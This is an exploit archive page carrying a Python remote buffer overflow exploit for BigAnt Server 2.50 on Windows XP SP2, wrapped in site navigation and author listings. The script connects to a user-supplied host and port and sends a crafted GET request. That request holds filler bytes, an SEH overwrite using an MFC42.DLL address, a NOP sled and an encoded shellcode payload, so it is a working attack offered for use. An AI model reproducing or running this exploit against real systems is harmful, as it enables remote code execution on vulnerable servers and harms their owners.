BigAnt Server 2.50 Buffer Overflow

BigAnt Server 2.50 Buffer Overflow: Posted Sep 16, 2009; Authored by hack4love; BigAnt Server version 2.50 GET request universal remote buffer overflow exploit.; tags | exploit, remote, overflow; SHA-256 | d319637b3b31a2fe66d38baccb05654ebd1e0686dbac4177fae18aef461e4d6a; Download | Favorite | View

BigAnt Server 2.50 Buffer Overflow

#!/usr/bin/python
# by hack4love
# BigAnt Server version 2.50 SEH Overwrite Universal
# discovered by Blake http://www.milw0rm.com/exploits/9673
# Tested on Windows XP SP2
# gratez to Blake
# use >> bigant.py 192.168.1.12 6660


import socket, sys

if len(sys.argv)!= 3:
print "\n[*] Usage: %s <ip> <port>\n" % sys.argv[0]
sys.exit(0)

host = sys.argv[1]
port = int(sys.argv[2]) # port 6660 by default


shellcode = (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41"
"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x51\x32\x42\x42\x32\x41"
"\x41\x30\x41\x41\x42\x58\x38\x42\x42\x50\x75\x4b\x59\x4b\x4c\x59"
"\x78\x52\x64\x63\x30\x65\x50\x53\x30\x4e\x6b\x57\x35\x77\x4c\x6c"
"\x4b\x61\x6c\x63\x35\x73\x48\x67\x71\x48\x6f\x6e\x6b\x50\x4f\x45"
"\x48\x6e\x6b\x53\x6f\x61\x30\x73\x31\x38\x6b\x53\x79\x4e\x6b\x66"
"\x54\x6e\x6b\x46\x61\x38\x6e\x30\x31\x6b\x70\x6e\x79\x6e\x4c\x4f"
"\x74\x79\x50\x74\x34\x44\x47\x4f\x31\x59\x5a\x76\x6d\x55\x51\x59"
"\x52\x68\x6b\x4a\x54\x35\x6b\x71\x44\x65\x74\x37\x74\x31\x65\x4a"
"\x45\x6e\x6b\x73\x6f\x44\x64\x55\x51\x4a\x4b\x50\x66\x4c\x4b\x44"
"\x4c\x30\x4b\x6e\x6b\x53\x6f\x37\x6c\x46\x61\x58\x6b\x6c\x4b\x77"
"\x6c\x6e\x6b\x46\x61\x5a\x4b\x4f\x79\x31\x4c\x47\x54\x37\x74\x6a"
"\x63\x74\x71\x59\x50\x70\x64\x6e\x6b\x51\x50\x50\x30\x6e\x65\x4b"
"\x70\x72\x58\x64\x4c\x6c\x4b\x71\x50\x56\x6c\x4e\x6b\x52\x50\x57"
"\x6c\x6c\x6d\x4c\x4b\x63\x58\x73\x38\x5a\x4b\x45\x59\x4e\x6b\x4f"
"\x70\x4c\x70\x35\x50\x43\x30\x63\x30\x4c\x4b\x53\x58\x77\x4c\x73"
"\x6f\x56\x51\x48\x76\x53\x50\x66\x36\x4f\x79\x39\x68\x6f\x73\x39"
"\x50\x61\x6b\x30\x50\x61\x78\x4a\x50\x6c\x4a\x73\x34\x33\x6f\x45"
"\x38\x6d\x48\x49\x6e\x6c\x4a\x46\x6e\x76\x37\x69\x6f\x48\x67\x45"
"\x33\x73\x51\x72\x4c\x71\x73\x63\x30\x41")


payload = "\x41" * 985
next_seh = "\xeb\x06\x90\x90"
seh = "\xc3\x20\xc4\x6b" #MFC42.DLL
nops = "\x90" * 10
sec = shellcode

print "[+] Connecting to %s on port %d" % (host,port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((host,port))
except:
print "[x] Error establishing connection\n"
sys.exit(0)

print "[+] Sending payload"
s.send("GET " + payload + next_seh + seh + nops + sec + "\r\n\r\n")
s.close()

Top Authors In Last 30 Days

Red Hat 184 files
Ubuntu 64 files
Debian 22 files
Valentin Lobstein 11 files
nu11secur1ty 9 files
Google Security Research 6 files
Apple 6 files
malvuln 4 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,009)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,174)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,460)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,433)
UNIX (9,390)
UnixWare (187)
Windows (6,648)
Other

BigAnt Server 2.50 Buffer Overflow

BigAnt Server 2.50 Buffer Overflow

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

BigAnt Server 2.50 Buffer Overflow

Share This

BigAnt Server 2.50 Buffer Overflow

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems